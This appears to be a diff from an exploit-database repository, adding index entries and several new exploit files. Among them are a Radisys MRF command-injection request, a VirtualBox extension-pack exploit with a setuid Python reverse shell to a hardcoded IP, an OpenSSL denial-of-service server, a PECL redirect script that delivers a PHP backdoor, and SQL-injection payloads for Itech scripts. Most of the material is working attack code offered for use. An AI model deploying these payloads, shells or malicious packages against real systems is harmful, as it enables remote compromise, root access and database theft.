@ -37102,7 +37104,7 @@ id,file,description,date,author,platform,type,port
 41155,platforms/php/webapps/41155.txt,"Movie Portal Script 7.36 - Multiple Vulnerabilities",2017-01-25,"Marc Castejon",php,webapps,0
 41156,platforms/php/webapps/41156.py,"Joomla! < 2.5.2 - Admin Creation",2017-01-20,"Charles Fol",php,webapps,0
 41157,platforms/php/webapps/41157.py,"Joomla! < 3.6.4 - Admin TakeOver",2017-01-20,"Charles Fol",php,webapps,0
-41159,platforms/php/webapps/41159.txt,"Pear HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,php,webapps,0
+41159,platforms/php/webapps/41159.txt,"PHP PEAR HTTP_Upload 1.0.0b3 - Arbitrary File Upload",2017-01-26,hyp3rlinx,php,webapps,0
 41166,platforms/php/webapps/41166.txt,"KB Affiliate Referral Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
 41167,platforms/php/webapps/41167.txt,"KB Login Authentication Script 1.1 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
 41168,platforms/php/webapps/41168.txt,"KB Messages PHP Script 1.0 - Authentication Bypass",2017-01-26,"Ihsan Sencan",php,webapps,0
@ -37112,7 +37114,25 @@ id,file,description,date,author,platform,type,port
 41175,platforms/hardware/webapps/41175.txt,"Polycom VVX Web Interface - Change Admin Password",2017-01-26,"Mike Brown",hardware,webapps,0
 41177,platforms/php/webapps/41177.txt,"My Photo Gallery 1.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
 41178,platforms/php/webapps/41178.txt,"Maian Weblog 4.0 - SQL Injection",2017-01-27,"Kaan KAMIS",php,webapps,0
 41179,platforms/cgi/webapps/41179.txt,"Radisys MRF - Command Injection",2017-01-27,"Filippos Mastrogiannis",cgi,webapps,0
 41180,platforms/php/webapps/41180.txt,"WordPress Plugin WP Private Messages 1.0.1 - SQL Injection",2017-01-27,"Lenon Leite",php,webapps,0
 41181,platforms/php/webapps/41181.txt,"Online Hotel Booking System Pro 1.2 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
 41182,platforms/php/webapps/41182.txt,"WordPress Plugin Online Hotel Booking System Pro 1.0 - SQL Injection",2017-01-27,"Ihsan Sencan",php,webapps,0
 41184,platforms/php/webapps/41184.txt,"TrueConf Server 4.3.7 - Multiple Vulnerabilities",2017-01-29,LiquidWorm,php,webapps,0
 41185,platforms/php/webapps/41185.txt,"PHP PEAR 1.10.1 - Arbitrary File Download",2017-01-30,hyp3rlinx,php,webapps,0
 41186,platforms/php/webapps/41186.txt,"Caregiver Script 2.57 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41187,platforms/php/webapps/41187.txt,"Auction Script 6.49 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41188,platforms/php/webapps/41188.txt,"Itech B2B Script 4.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41189,platforms/php/webapps/41189.txt,"Itech Classifieds Script 7.27 - 'scat' Parameter SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41190,platforms/php/webapps/41190.txt,"Itech Dating Script 3.26 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41191,platforms/php/webapps/41191.txt,"Itech Freelancer Script 5.13 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41193,platforms/php/webapps/41193.txt,"Itech Multi Vendor Script 6.49 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41194,platforms/php/webapps/41194.txt,"Itech News Portal Script 6.28 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41195,platforms/php/webapps/41195.txt,"Itech Real Estate Script 3.12 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41197,platforms/php/webapps/41197.txt,"PHP Product Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
 41198,platforms/php/webapps/41198.txt,"PHP Logo Designer Script - Arbitrary File Upload",2017-01-30,"Ihsan Sencan",php,webapps,0
 41199,platforms/php/webapps/41199.txt,"Video Sharing Script 4.94 - SQL Injection",2017-01-30,"Kaan KAMIS",php,webapps,0
 41200,platforms/php/webapps/41200.py,"HelpDeskZ < 1.0.2 - Authenticated SQL Injection / Unauthorized File Download",2017-01-30,"Mariusz Poplawski",php,webapps,0
 41201,platforms/php/webapps/41201.txt,"Itech Classifieds Script 7.27 - 'pid' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
 41202,platforms/php/webapps/41202.txt,"Itech Dating Script 3.26 - 'send_gift.php' SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
 41203,platforms/php/webapps/41203.txt,"Itech Real Estate Script 3.12 - 'id' Parameter SQL Injection",2017-01-30,"Ihsan Sencan",php,webapps,0
--- a/platforms/cgi/remote/40949.rb
+++ b/platforms/cgi/remote/40949.rb
@ -1,4 +1,6 @@
 #
 # Source: https://github.com/pedrib/PoC/blob/2133bc3c0864c332bff7ce1000c83311316ac8ff/exploits/netgearPwn.rb
 #
 # Remote code execution in NETGEAR WNR2000v5
 # - by Pedro Ribeiro (pedrib@gmail.com) / Agile Information Security
 # Released on 20/12/2016
--- a/platforms/cgi/webapps/41179.txt
+++ b/platforms/cgi/webapps/41179.txt
@ -0,0 +1,78 @@
 Title:      MRF Web Panel OS Command Injection
 Vendor:     Radisys
 Vendor Homepage: http://www.radisys.com
 Product:    MRF Web Panel (SWMS)
 Version:    9.0.1
 CVE:        CVE-2016-10043
 CWE:        CWE-78
 Risk Level: High
 Discovery:  Filippos Mastrogiannis, Loukas Alkis & Dimitrios Maragkos
            COSMOTE (OTE Group) Information & Network Security
 -----------------------------------------------------------------------------------------
 Vulnerability Details:
 The MRF Web Administration Panel (SWMS) is vulnerable to OS Command Injection
 attacks.
 Affected parameter: MSM_MACRO_NAME (POST parameter)
 Affected file: ms.cgi (/swms/ms.cgi)
 Verified Affected Operation: Show Fatal Error and Log Package Configuration
 It is possible to use the pipe character (|) to inject arbitrary OS commands
 and retrieve the output in the application's responses.
 Proof Of Concept:
 The attacker can login to the web panel as a standard user (non-administrator account)
 and inject the POST parameter: MSM_MACRO_NAME with the following
 payload: Show_Fatal_Error_Configuration|||a #' |<command>||a #|" |||a #
 As a result the attacker receives the result of the command in the application response
 In order to reproduce the vulnerability:
 1. Login to the vulnerable MRF SWMS web panel as a standard user (non-administrator):
 https://vulnsite.com/swms
 2. Fire up your favorite intercepting proxy tool (Burp Suite, OWASP ZAP etc), set your session id
 and send the following POST request in order to retrieve the output of the 'pwd' command:
 POST /swms/ms.cgi HTTP/1.1
 Host: vulnhost
 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0
 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
 Accept-Language: en-US,en;q=0.5
 Accept-Encoding: gzip, deflate, br
 Referer: https://vulnsite/swms/ms.cgi?MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-GETFIRSTINPUT
 Connection: close
 Content-Type: application/x-www-form-urlencoded
 Content-Length: 213
 MSM_SID=<session_id>&MSM_MACRO_NAME=Show_Fatal_Error_Configuration|||a%20%23'%20|pwd||a%20%23|"%20|||a%20%23&MSM_MACRO_CATEGORY=%3CMSM_MACRO_CATEGORY%3E&PROGRAM=IO&MSM_MACRO_INPUT=-EXECUTE&Btn_Execute=Execute
 3. You can see the output of the command 'pwd' in the server response:
 HTTP/1.1 200 OK
 Date: Thu, 21 Jul 2016 08:18:43 GMT
 Server: Apache
 Cache-Control: no-cache
 Connection: close
 Content-Type: text/html; charset=UTF-8
 Content-Length: 23
 /var/opt/swms/www/html
 Vulnerability Impact:
 Application's own data and functionality or the web server can be compromised due
 to OS command injection vulnerabilities. It may also be possible to use the server
 as a platform for attacks against other systems.
 Disclaimer:
 The responsible disclosure policy has been followed
--- a/platforms/lin_x86-64/local/40489.txt
+++ b/platforms/lin_x86-64/local/40489.txt
--- a/platforms/linux/local/41196.txt
+++ b/platforms/linux/local/41196.txt
@ -0,0 +1,192 @@
 == [ Overview ] ===
    System affected: VirtualBox
    Software-Version: prior to 5.0.32, prior to 5.1.14
    User-Interaction: Required
    Impact: A Man-In-The-Middle could infiltrate an
 Extension-Pack-Update to gain a root-shell
 === [ Detailed description ] ===
 In my research about update mechanism of open-source software I found
 vulnerabilities in Oracle's VirtualBox. It's possible to compromise a
 system behind a firewall by infiltrating the updates of Extension-Packs
 because of the following flaws:
 1.  The Extension-Pack is updated via HTTP instead of HTTPS. The
 Extension-Packs are not signed, so a Man-In-The-Middle could send his
 own Extension-Pack(with malicious code included) instead of the regular
 update to the target. The Code would be executed with user-permissions.
 I reported this bug to Oracle but I think someone else discovered and
 reported it before. This bug also affects VirtualBox prior to 5.0.32,
 prior to 5.1.14. I don't know the CVE.
 2.  CVE-2017-3316: There is a privilege escalation bug in the downloader
 of VirtualBox. Extension-Packs are tar-archives. Tar-archives can
 preserve permissions.  A Man-In-The-Middle could include an executable
 with setuid-permissions to the Extension-Pack. If the victim downloads
 the Ext-pack, it will be stored as owner root and without checking the
 permissions of the binaries. This bug affects VirtualBox prior to
 5.0.32, prior to 5.1.14
 === [ Proof-Of-Concept ] ===
 The executeable of the following code is placed in the
 Extension-Pack-Archive under linux.amd64/evil with setuid.
 /* evil.c(executable with the reverse-shell) */
 #include <unistd.h>
 int main()
 {
        setuid(0);
        execl("/usr/bin/python","python","-c","import
 socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"10.12.32.15\",5000));os.dup2(s.fileno(),0);
 os.dup2(s.fileno(),1);
 os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/bash\",\"-i\"]);",NULL);
        return 0;
 }
 The  VirtualBox-Sources are downloaded next and the following code has
 to be placed under src/VBox/ExtPacks/Evil/VBoxEvilMain.cpp:
 /* $Id: VBoxEvilMain.cpp $ */
 /** @file
 * Evil main module.
 */
 /*
 * Copyright (C) 2010-2016 Oracle Corporation
 *
 * Permission is hereby granted, free of charge, to any person
 * obtaining a copy of this software and associated documentation
 * files (the "Software"), to deal in the Software without
 * restriction, including without limitation the rights to use,
 * copy, modify, merge, publish, distribute, sublicense, and/or sell
 * copies of the Software, and to permit persons to whom the
 * Software is furnished to do so, subject to the following
 * conditions:
 *
 * The above copyright notice and this permission notice shall be
 * included in all copies or substantial portions of the Software.
 *
 * THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
 * EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
 * OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
 * NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
 * HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
 * WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
 * FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
 * OTHER DEALINGS IN THE SOFTWARE.
 */
 #include <VBox/ExtPack/ExtPack.h>
 #include <VBox/err.h>
 #include <VBox/version.h>
 #include <VBox/vmm/cfgm.h>
 #include <iprt/string.h>
 #include <iprt/param.h>
 #include <iprt/path.h>
 static PCVBOXEXTPACKHLP g_pHlp;
 static const VBOXEXTPACKREG g_vboxEvilExtPackReg =
 {
    VBOXEXTPACKREG_VERSION,
    /* .uVBoxFullVersion =  */  VBOX_FULL_VERSION,
    /* .pfnInstalled =      */  NULL,
    /* .pfnUninstall =      */  NULL,
    /* .pfnVirtualBoxReady =*/  NULL,
    /* .pfnConsoleReady =   */  NULL,
    /* .pfnUnload =         */  NULL,
    /* .pfnVMCreated =      */  NULL,
    /* .pfnVMConfigureVMM = */  NULL,
    /* .pfnVMPowerOn =      */  NULL,
    /* .pfnVMPowerOff =     */  NULL,
    /* .pfnQueryObject =    */  NULL,
    /* .pfnReserved1 =      */  NULL,
    /* .pfnReserved2 =      */  NULL,
    /* .pfnReserved3 =      */  NULL,
    /* .pfnReserved4 =      */  NULL,
    /* .pfnReserved5 =      */  NULL,
    /* .pfnReserved6 =      */  NULL,
    /* .u32Reserved7 =      */  0,
    VBOXEXTPACKREG_VERSION
 };
 #include <unistd.h>
 /** @callback_method_impl{FNVBOXEXTPACKREGISTER}  */
 extern "C" DECLEXPORT(int) VBoxExtPackRegister(PCVBOXEXTPACKHLP pHlp,
 PCVBOXEXTPACKREG *ppReg, PRTERRINFO pErrInfo)
 {
    pid_t pid = fork();
        if(pid == 0)
        {
 execl("/usr/lib/virtualbox/ExtensionPacks/Oracle_VM_VirtualBox_Extension_Pack/linux.amd64/evil","evil",NULL);
        }
    /*
     * Check the VirtualBox version.
     */
    if (!VBOXEXTPACK_IS_VER_COMPAT(pHlp->u32Version,
 VBOXEXTPACKHLP_VERSION))
        return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH,
                             "Helper version mismatch - expected %#x got
 %#x",
                             VBOXEXTPACKHLP_VERSION, pHlp->u32Version);
    if (   VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion) !=
 VBOX_VERSION_MAJOR
        || VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion) !=
 VBOX_VERSION_MINOR)
        return RTErrInfoSetF(pErrInfo, VERR_VERSION_MISMATCH,
                             "VirtualBox version mismatch - expected
 %u.%u got %u.%u",
                             VBOX_VERSION_MAJOR, VBOX_VERSION_MINOR,
 VBOX_FULL_VERSION_GET_MAJOR(pHlp->uVBoxFullVersion),
 VBOX_FULL_VERSION_GET_MINOR(pHlp->uVBoxFullVersion));
    /*
     * We're good, save input and return the registration structure.
     */
    g_pHlp = pHlp;
    *ppReg = &g_vboxEvilExtPackReg;
    return VINF_SUCCESS;
 }
 After compiling, this Extension-Pack-Module is placed in the Archive
 under linux.amd64/VBoxEvilMain.so. It's also necessary to modify the
 ExtPack.xml so that the Evil-Module is used:
 <!--?xml version="1.0"?-->
 <virtualboxextensionpack version="1.0"
 xmlns="http://www.virtualbox.org/VirtualBoxExtensionPack";>
    <name>Oracle VM VirtualBox Extension Pack</name>
    <description>USB 2.0 and USB 3.0 Host Controller, Host Webcam,
 VirtualBox RDP, PXE ROM, Disk Encryption.</description>
    <version revision="112026">5.1.10</version>
    <mainmodule>VBoxEvilMain</mainmodule>
    <vrdemodule>VBoxVRDP</vrdemodule>
    <showlicense>
 </showlicense></virtualboxextensionpack>
 Note: To make this Extension-Pack valid it is necessary to add all the
 file-checksumms to ExtPack.manifest. The victim will be asked for the
 root password during the update. If the attacker sends this malicious
 Extension-Pack, a reverse root-shell will be executed.
 === [ Timeline ] ===
 This bug was reported in December. Oracle answered on the same day and
 gave status reports regularly. They released a patch on January 17th.
 === [ Credits ] ===
 CVE-2017-3316 was discovered by Wolfgang Hotwagner
 (https://tech.feedyourhead.at/content/privilege-escalation-in-virtualbox-cve-2017-3316)
--- a/platforms/multiple/dos/41192.c
+++ b/platforms/multiple/dos/41192.c
@ -0,0 +1,212 @@
 // Source: https://guidovranken.wordpress.com/2017/01/26/cve-2017-3730-openssl-1-1-0-remote-client-denial-of-service-affects-servers-as-well-poc/
 /*
 *  SSL server demonstration program
 *
 *  Copyright (C) 2006-2015, ARM Limited, All Rights Reserved
 *  SPDX-License-Identifier: Apache-2.0
 *
 *  Licensed under the Apache License, Version 2.0 (the "License"); you may
 *  not use this file except in compliance with the License.
 *  You may obtain a copy of the License at
 *
 *  http://www.apache.org/licenses/LICENSE-2.0
 *
 *  Unless required by applicable law or agreed to in writing, software
 *  distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
 *  WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 *  See the License for the specific language governing permissions and
 *  limitations under the License.
 *
 *  This file is part of mbed TLS (https://tls.mbed.org)
 */
 /* Taken from mbed TLS programs/ssl/ssl_server.c and modified to crash postfix.
 * Belongs to https://github.com/guidovranken/CVE-2017-3730
 */
 #include <stdlib.h>
 #include <string.h>
 #include "mbedtls/entropy.h"
 #include "mbedtls/ctr_drbg.h"
 #include "mbedtls/certs.h"
 #include "mbedtls/x509.h"
 #include "mbedtls/ssl.h"
 #include "mbedtls/net_sockets.h"
 #include "mbedtls/error.h"
 #include "mbedtls/debug.h"
 static int write_and_get_response( mbedtls_net_context *sock_fd, char *buf, size_t len )
 {
    int ret;
    if ( (ret = mbedtls_net_send( sock_fd, (unsigned char*)buf, strlen(buf) )) <= 0 )
    {
        return -1;
    }
    memset( buf, 0, len );
    ret = mbedtls_net_recv( sock_fd, (unsigned char*)buf, len );
    return ret;
 }
 int main( void )
 {
    int ret;
    mbedtls_net_context listen_fd, client_fd;
    char buf[1024];
    const char *pers = "ssl_server";
    int force_ciphersuite[2];
    mbedtls_entropy_context entropy;
    mbedtls_ctr_drbg_context ctr_drbg;
    mbedtls_ssl_context ssl;
    mbedtls_ssl_config conf;
    mbedtls_x509_crt srvcert;
    mbedtls_pk_context pkey;
    mbedtls_net_init( &listen_fd );
    mbedtls_net_init( &client_fd );
    mbedtls_ssl_init( &ssl );
    mbedtls_ssl_config_init( &conf );
    mbedtls_x509_crt_init( &srvcert );
    mbedtls_pk_init( &pkey );
    mbedtls_entropy_init( &entropy );
    mbedtls_ctr_drbg_init( &ctr_drbg );
    ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_srv_crt,
                          mbedtls_test_srv_crt_len );
    if( ret != 0 )
    {
        goto exit;
    }
    ret = mbedtls_x509_crt_parse( &srvcert, (const unsigned char *) mbedtls_test_cas_pem,
                          mbedtls_test_cas_pem_len );
    if( ret != 0 )
    {
        goto exit;
    }
    ret =  mbedtls_pk_parse_key( &pkey, (const unsigned char *) mbedtls_test_srv_key,
                         mbedtls_test_srv_key_len, NULL, 0 );
    if( ret != 0 )
    {
        goto exit;
    }
    if( ( ret = mbedtls_net_bind( &listen_fd, NULL, "8888", MBEDTLS_NET_PROTO_TCP ) ) != 0 )
    {
        goto exit;
    }
    if( ( ret = mbedtls_ctr_drbg_seed( &ctr_drbg, mbedtls_entropy_func, &entropy,
                               (const unsigned char *) pers,
                               strlen( pers ) ) ) != 0 )
    {
        goto exit;
    }
    if( ( ret = mbedtls_ssl_config_defaults( &conf,
                    MBEDTLS_SSL_IS_SERVER,
                    MBEDTLS_SSL_TRANSPORT_STREAM,
                    MBEDTLS_SSL_PRESET_DEFAULT ) ) != 0 )
    {
        goto exit;
    }
    mbedtls_ssl_conf_rng( &conf, mbedtls_ctr_drbg_random, &ctr_drbg );
    mbedtls_ssl_conf_ca_chain( &conf, srvcert.next, NULL );
    if( ( ret = mbedtls_ssl_conf_own_cert( &conf, &srvcert, &pkey ) ) != 0 )
    {
        goto exit;
    }
    force_ciphersuite[0] = mbedtls_ssl_get_ciphersuite_id( "TLS-DHE-RSA-WITH-AES-256-GCM-SHA384" );
    force_ciphersuite[1] = 0;
    mbedtls_ssl_conf_ciphersuites( &conf, force_ciphersuite );
    if( ( ret = mbedtls_ssl_setup( &ssl, &conf ) ) != 0 )
    {
        goto exit;
    }
 reset:
    mbedtls_net_free( &client_fd );
    mbedtls_ssl_session_reset( &ssl );
    if( ( ret = mbedtls_net_accept( &listen_fd, &client_fd,
                                    NULL, 0, NULL ) ) != 0 )
    {
        goto exit;
    }
    sprintf(buf, "220 ok\n");
    ret = write_and_get_response( &client_fd, buf, sizeof(buf));
    if ( ret < 5 ) {
        goto exit;
    }
    if ( strncmp(buf, "EHLO ", 5) != 0 ) {
        goto exit;
    }
    sprintf(buf, "250-SIZE 157286400\n250-8BITMIME\n250-STARTTLS\n250-ENHANCEDSTATUSCODES\n250-PIPELINING\n250-CHUNKING\n250 SMTPUTF8\n");
    ret = write_and_get_response( &client_fd, buf, sizeof(buf));
    if ( ret < 8 ) {
        goto exit;
    }
    if ( strncmp(buf, "STARTTLS", 8) != 0 ) {
        goto exit;
    }
    sprintf(buf, "220 ok\n");
    ret = mbedtls_net_send( &client_fd, (unsigned char*)buf, strlen(buf) );
    if ( ret < 0 ) {
        goto exit;
    }
    mbedtls_ssl_set_bio( &ssl, &client_fd, mbedtls_net_send, mbedtls_net_recv, NULL );
    while( ( ret = mbedtls_ssl_handshake( &ssl ) ) != 0 )
    {
        if( ret != MBEDTLS_ERR_SSL_WANT_READ && ret != MBEDTLS_ERR_SSL_WANT_WRITE )
        {
            goto reset;
        }
    }
    while( ( ret = mbedtls_ssl_close_notify( &ssl ) ) < 0 )
    {
        if( ret != MBEDTLS_ERR_SSL_WANT_READ &&
            ret != MBEDTLS_ERR_SSL_WANT_WRITE )
        {
            goto reset;
        }
    }
    ret = 0;
    goto reset;
 exit:
    mbedtls_net_free( &client_fd );
    mbedtls_net_free( &listen_fd );
    mbedtls_x509_crt_free( &srvcert );
    mbedtls_pk_free( &pkey );
    mbedtls_ssl_free( &ssl );
    mbedtls_ssl_config_free( &conf );
    mbedtls_ctr_drbg_free( &ctr_drbg );
    mbedtls_entropy_free( &entropy );
    return( ret );
 }
--- a/platforms/php/webapps/41185.txt
+++ b/platforms/php/webapps/41185.txt
@ -0,0 +1,140 @@
 [+]#############################################################################################
 [+] Credits / Discovery: John Page AKA hyp3rlinx	
 [+] Website: hyp3rlinx.altervista.org
 [+] Source:  http://hyp3rlinx.altervista.org/advisories/PEAR-ARBITRARY-FILE-DOWNLOAD.txt
 [+] ISR: ApparitionSEC
 [+]#############################################################################################
 Vendor:
 ============
 pear.php.net
 Product:
 ===================================
 PEAR Base System v1.10.1
 PEAR Installer's download utility
 Vulnerability Type:
 =======================
 Arbitrary File Download
 CVE Reference:
 ==============
 CVE-2017-5630
 Security Issue:
 ================
 The download utility class in the Installer in PEAR Base System v1.10.1, does not validate file types and filenames after a redirect,
 which allows remote HTTP servers to overwrite files via crafted responses, as demonstrated by a .htaccess overwrite.
 e.g.
 pecl download <http://some-vuln-server/file.tgz> 
 PEAR does not rename the arbitrary invalid file to the originally requested (safe) filename.
 Therefore, attackers can overwrite files or download a backdoor if the PECL request is made from from web accesible directory etc..
 Moreover, PECL doesn't delete these invalid files upon download, giving the attacker time to exploit it if attackers
 can force the HTTP connection to stay open, and before a "invalid file message" is noticed.
 POC Video:
 https://vimeo.com/201341280
 Proof of concept:
 This POC involves 3 machines:
 First machine is victim making a PECL download command request
 Second is the vuln server receiving the file download request
 Third is the malicious server hosting the PHP backdoor, .htaccess file etc.
 ===========================================================================
 1) Victim machine attempts to download a legit ".tgz" archive.
 pecl download http://VULN-SERVER:8080/Test.tgz
 2) VULN-SERVER where the victim is requesting "Test.tgz", and attacker controls HTTP response.
 3) EVIL-SERVER where PECL follows and downloads 'unintended' Evil.php backdoor.
 python -m SimpleHTTPServer 8888
 On VULN-SERVER run "PECL-File-Exploit.py"
 python PECL-File-Exploit.py 
 import socket
 HOST='localhost'
 PORT=8080
 TARGET='http://EVIL-SERVER:8888/'
 FILE='.htaccess'
 s = socket.socket()
 s.bind((HOST, PORT))
 s.listen(10)
 print 'Waiting for PECL connections...'
 while True:
    conn, addr = s.accept()
    junk = conn.recv(512) 
    conn.send('HTTP/1.1 302 Found\r\n')
    conn.send('Location: '+TARGET+FILE+'\r\n')
    conn.close()
 s.close()
 Then, make request for Test.tgz...
 C:\xampp\htdocs\webapp>pecl download http://VULN-SERVER:8080/Test.tgz
 downloading Evil.php ...
 Starting to download Evil.php (4,665 bytes)
 .....done: 4,665 bytes
 File C:\xampp\htdocs\webapp\Evil.php downloaded
 Disclosure Timeline:
 =====================================
 Vendor Notification: January 11, 2017
 Informed "PECL package no longer maintained" : January 23, 2017
 Opened Bug #2117 : January 25, 2017
 January 29, 2017 : Public Disclosure
 Network Access:
 ================
 Remote
 Severity:
 =========
 High
 [+] Disclaimer
 The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
 Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
 that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
 is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
 for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
 or exploits by the author or elsewhere. 
--- a/platforms/php/webapps/41186.txt
+++ b/platforms/php/webapps/41186.txt
@ -0,0 +1,23 @@
 Exploit Title: Caregiver Script v2.57 – SQL Injection
 Date: 30.01.2017
 Vendor Homepage: http://itechscripts.com/
 Software Link: http://itechscripts.com/caregiver-script/
 Exploit Author: Kaan KAMIS
 Contact: iletisim[at]k2an[dot]com
 Website: http://k2an.com
 Category: Web Application Exploits
 Overview
 Caregiver Script 2.51 is the best solution to launch a portal for hiring people for babysitting and other care giving services in a hassle free manner.
 Type of vulnerability:
 An SQL Injection vulnerability in Caregiver Script allows attackers to read
 arbitrary administrator data from the database.
 Vulnerable Url:
 http://locahost/searchJob.php?sitterService=1[payload]
 Vulnerable parameter : sitterService
 Mehod : GET
--- a/platforms/php/webapps/41187.txt
+++ b/platforms/php/webapps/41187.txt
@ -0,0 +1,30 @@
 Exploit Title: Itech Auction Script v6.49 – SQL Injection
 Date: 30.01.2017
 Vendor Homepage: http://itechscripts.com/
 Software Link: http://itechscripts.com/auction-script/
 Exploit Author: Kaan KAMIS
 Contact: iletisim[at]k2an[dot]com
 Website: http://k2an.com
 Category: Web Application Exploits
 Overview
 Auction Script v6.49 is the best standard auction product. This also comes pre-integrated with a robust Multi-Vendor interface and a powerful CMS panel.
 Type of vulnerability:
 An SQL Injection vulnerability in Itech Auction Script allows attackers to read
 arbitrary data from the database.
 Vulnerability:
 URL : http://locahost/mcategory.php?mcid=4[payload]
 Parameter: mcid (GET)
 Type: boolean-based blind
 Title: AND boolean-based blind - WHERE or HAVING clause
 Payload: mcid=4' AND 1734=1734 AND 'Ggks'='Ggks
 Type: UNION query
 Title: Generic UNION query (NULL) - 1 column
 Payload: mcid=-5980' UNION ALL SELECT CONCAT(0x71706b7171,0x764646494f4c7178786f706c4b4749517349686768525865666c6b6456434c766b73755a44657777,0x7171706a71)-- XAee
--- a/platforms/php/webapps/41188.txt
+++ b/platforms/php/webapps/41188.txt
@ -0,0 +1,34 @@
 Exploit Title: Itech B2B Script v4.28 – SQL Injection
 Date: 30.01.2017
 Vendor Homepage: http://itechscripts.com/
 Software Link: http://itechscripts.com/b2b-script/
 Exploit Author: Kaan KAMIS
 Contact: iletisim[at]k2an[dot]com
 Website: http://k2an.com
 Category: Web Application Exploits
 Overview
 B2B Script v4.28 is a versatile web solution for the webmasters who are willing to launch their own B2B Portal within a few minutes.
 Type of vulnerability:
 An SQL Injection vulnerability in Itech B2B Script v4.28 allows attackers to read
 arbitrary data from the database.
 Vulnerability:
 URL : catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7[payload]
 Parameter: #1* (URI)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' AND 6539=6539 AND 'Fakj'='Fakj
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: http://localhost/catcompany.php?token=704667c6a1e7ce56d3d6fa748ab6d9af3fd7' OR SLEEP(5) AND 'aEyV'='aEyV
    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: http://localhost/catcompany.php?token=-4421' UNION ALL SELECT NULL,CONCAT(0x71627a7071,0x596a5174756f74736847615667486444426f697a5549434943697a697064466865494a7156794770,0x716b707a71),NULL,NULL,NULL,NULL-- JwUA ---
--- a/platforms/php/webapps/41189.txt
+++ b/platforms/php/webapps/41189.txt
@ -0,0 +1,30 @@
 Exploit Title: Itech Classifieds Script v7.27 – SQL Injection
 Date: 30.01.2017
 Vendor Homepage: http://itechscripts.com/
 Software Link: http://itechscripts.com/classifieds-script/
 Exploit Author: Kaan KAMIS
 Contact: iletisim[at]k2an[dot]com
 Website: http://k2an.com
 Category: Web Application Exploits
 Overview
 Classifieds Script v7.27 is the best classifieds software. Try this script and present yourself with a robust digital platform.
 Type of vulnerability:
 An SQL Injection vulnerability in Classifieds Script v7.27 allows attackers to read
 arbitrary data from the database.
 Vulnerability:
 URL : http://localhost/subpage.php?scat=51[payload]
 Parameter: scat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: scat=51' AND 4941=4941 AND 'hoCP'='hoCP
    Type: UNION query
    Title: Generic UNION query (NULL) - 26 columns
    Payload: scat=51' UNION ALL SELECT CONCAT(0x7162787871,0x6d4d4d63544378716c72467441784342664b4a6f424d615951594f476c53465070635545505a7558,0x716b767671),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- SKES
--- a/platforms/php/webapps/41190.txt
+++ b/platforms/php/webapps/41190.txt
@ -0,0 +1,26 @@
 Exploit Title: Itech Dating Script v3.26 – SQL Injection
 Date: 30.01.2017
 Vendor Homepage: http://itechscripts.com/
 Software Link: http://itechscripts.com/dating-script/
 Exploit Author: Kaan KAMIS
 Contact: iletisim[at]k2an[dot]com
 Website: http://k2an.com
 Category: Web Application Exploits
 Overview
 Itech Dating Script v3.26 is a powerful platform to launch a dating portal. This product is extremely popular among the new webmasters.
 Type of vulnerability:
 An SQL Injection vulnerability in Itech Dating Script v3.26 allows attackers to read
 arbitrary data from the database.
